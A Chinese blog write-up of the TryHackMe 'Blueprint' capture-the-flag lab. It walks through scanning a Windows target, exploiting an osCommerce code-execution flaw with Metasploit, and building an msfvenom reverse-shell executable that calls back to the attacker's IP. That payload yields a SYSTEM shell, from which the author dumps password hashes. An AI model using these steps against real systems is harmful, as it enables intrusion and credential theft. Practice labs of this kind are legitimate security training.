TryHackMe - Blueprint靶场

最新推荐文章于 2023-11-18 21:13:12 发布
最新推荐文章于 2023-11-18 21:13:12 发布
阅读量245 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 渗透测试 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/114536466
版权

Blueprint

Hack into this Windows machine and escalate your privileges to Administrator.
任务1(获得lab用户NT hash)
任务2(获得root Flag
  • RustScan
  • Nmap
  • MSF
  • msfvenom
  • dumphash

0x01 信息收集

先用rustscan 扫描目标机器全端口(速度比较快),根据端口分析应该是个Windows,攻击面比较多。
 
先用Nmap的综合扫描扫一波,显示8080有个文件遍历
 

0x02 漏洞利用

既然开着445端口,就用msf探测一下,运行后提示不可利用。
然后访问8080端口,发现有个文件遍历,根据目录索引,来到oscommerce路径下
根据searchsploit搜索得到许多的漏洞payload
 
顺便到msf上搜索对应的漏洞exp,这里有个代码执行。
 
设置好options就run,成功弹回meterpreter的Shell。但是这个Shell不太“健全”。猜测肯能时受制于PHP的原因。
 
利用msfvenom生成一个windows的shell。用刚刚不太健全的meterpreter上传到目标机上。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.92.88 LPORT=7878 -f exe > shell.exe
上传 upload [本地文件] [目标目录] 
upload /root/shell.exe c:\\
再访问shell.exe成功弹回meterpreter的shell,权限为system
 
完成任务一直接hashdump查看Lab用户的NT hash。使用在线网站解密敏文为:googleplus
 

0x03 root Flag

查看root 的flag ,一般在管理员的桌面。
 
z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TryhackmeBlueprint(RCE攻击)
阿道夫的博客
12-20 131
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
RustScan(端口扫描器)
z4yn:)的博客
03-08 6050
RustScan(端口扫描器) 在3秒内扫描所有65k端口。 完全支持脚本引擎。自动将结果导入Nmap,或使用我们的脚本(或编写您自己的脚本)执行任何您想要的操作。 适应性学习。你用得越多,RustScan的性能就越好。这里没有臃肿的机器学习,只有基础数学。 你所期望的通常情况。IPv6、CIDR、文件输入等。 自动将端口导入Nmap 0x01 安装 GiitHub:https://github.com/RustScan/RustScan kali安装包
TRY HACK ME| BLUE 永恒之蓝
AKAHRZ的博客
03-26 2593
永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的文件分享协议的漏洞进行散播。
Blue渗透测试练习
m0_62926909的博客
11-18 88
TryHackme-Blue房间练习 (利用常见的错误配置问题部署和侵入 Windows 计算机。)
用Rust保存Windows聚焦图片
编程老猫
04-04 407
Windows聚焦(Windows Spotlight)能够动态下载并随机切换Windows的锁屏壁纸,本文使用Rust语言开发自动保存Windows聚焦图片的工具,通过Windows计划任务自动存储照片后,在Windows背景中幻灯片播放壁纸。
react-blueprint
04-08
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
前端开源库-redux-blueprint
08-30
本文将深入探讨一个名为"redux-blueprint"的前端开源库,它是一个针对Redux状态管理框架的抽象操作工具,旨在简化Redux应用的开发流程。 **Redux简介** Redux是一个广泛使用的JavaScript状态容器,提供可预测化的...
ofsted-blueprint
03-12
蓝图 支持Ofsted制作的“ Ofsted最新学校检查结果”开放数据的Tymly蓝图。 关于数据 的信息和服务受《开放政府许可证》(OGL)的保护。 使用提供的专有信息受《 的条款约束。 领导和管理的总体有效性和有效性可能...
flask-blueprint-login-demo.zip
03-25
本项目"flask-blueprint-login-demo.zip"正是一个利用Flask蓝图(Blueprint)、flask-login和SQLAlchemy库来实现用户登录、注销、密码修改以及数据库操作CRUD(Create, Read, Update, Delete)的实战案例。...
node-blueprint:基于JavaScript的可视化脚本编辑器
03-31
一个抄袭Unreal Engine蓝图的基于JS的脚本编辑和运行程序 特性 轻松的拖拽单元和连线就可以编程 基于JavaScript,可规范的Web平台,开发简单 支持Electron可替代桌面平台 支持调试,单步执行,变量查看 ...
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
TryHackMe新手村
weixin_55154296的博客
04-17 7589
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
CTF平台搭建:CanHackMe
qq_45434762的博客
01-10 845
世间上的相遇都是久别重逢CanHackMe平台介绍 一个基于 php 的 CTF 开源平台。官网:https://canhack.me/项目地址:https://github.com/s...
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6591
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
TryHackMe - Source靶场
z4yn:)的博客
02-09 293
Source(Webmin) Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. ##0x01 信息收集 利用Namp扫描端口,只开放了22,10000端口,切入点应该是10000端口 访问10000端口是个Webmin的登录页面,试了一下账号爆破均不行 ##0x02 寻找EXP 搜索一下公开的漏洞,看到MSF上集成有许多个RCE的EXP ...
常见的隐写工具的使用
z4yn:)的博客
09-28 5246
隐写术 常见的隐写工具的使用 steghide 隐藏文件 steghide embed -cf [载体] -ef [隐藏的文件] -p [设置密码] 例:steghide embed -cf sun.jpg -ef a.txt -p 123123 提取文件 steghide extract -sf sun.jpg steghide不支持png格式的隐写,zsteg支持png。 zsteg 用gem安装zsteg,没有小飞机的用国内的源 proxychains代理一挂,30秒安.
RootMe
z4yn:)的博客
10-09 956
RootMe 获取root权限 先Nmap扫全端口,开放了22,80端口 在用Nmap -A 综合扫描指定的开放端口 只能从80端口入手,访问80 尝试访问一下robots.txt文件,不存在 用dirbutser扫网站目录,我一般配合dirb一起扫 两个都扫到一个uploads目录和panel目录 uploads通常用来放上传的文件 访问panel目录是个上传点,直接上传一个反弹shell的PHP脚本 用的是kali自带的PH...
CTF靶机 Agent sudo 笔记
z4yn:)的博客
06-23 914
Agent sudo 靶机介绍 : 你在深海里发现了一个秘密服务器。你的任务是侵入服务器内部并揭示真相。 靶机标签 : 枚举, 利用, 爆破, hash破解 Nmap扫一下发现3个开放端口 21, 22, 80 先访问80端口 访问网站需要修改User-Agent 为C才能触发到指定页面 可用BurpSuite抓包修改 也可以用kali自带的curl自定义请求包 curl -A "C" -L 10.10.183.111 发现一个用户名chris,根据提示要用这个用户名去爆破ftp协议 用Burp Sui
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 912
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
node-blueprint
最新发布
01-28
node-blueprint 是一种用于快速构建和部署 node.js 应用程序的工具。它提供了一套预定义的蓝图,这些蓝图定义了常见的应用程序架构和模块。使用 node-blueprint,开发人员可以通过简单地选择和配置适合他们需求的蓝图来快速地构建复杂的应用程序。 node-blueprint 的优势在于它将复杂的应用程序架构细节抽象出来,让开发人员可以更专注于应用程序的业务逻辑。它提供了一些常用的模块,如用户身份验证、数据持久化、日志记录等,这些模块可以通过简单的配置来集成到应用程序中。 另外,node-blueprint 还提供了一些蓝图来构建不同类型的应用程序,如 Web 应用程序、RESTful API、实时应用程序等。开发人员可以根据自己的需求选择适合的蓝图来快速开始开发。 使用 node-blueprint 可以节省开发时间和精力,避免重新编写重复的代码和进行繁琐的配置。它也提供了可扩展性和灵活性,开发人员可以根据自己的需求定制和编写自己的蓝图。 总之,node-blueprint 是一个辅助开发人员快速构建 node.js 应用程序的强大工具。它能够帮助开发人员提高开发效率,降低应用程序开发的复杂性,让开发人员更专注于业务逻辑的开发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值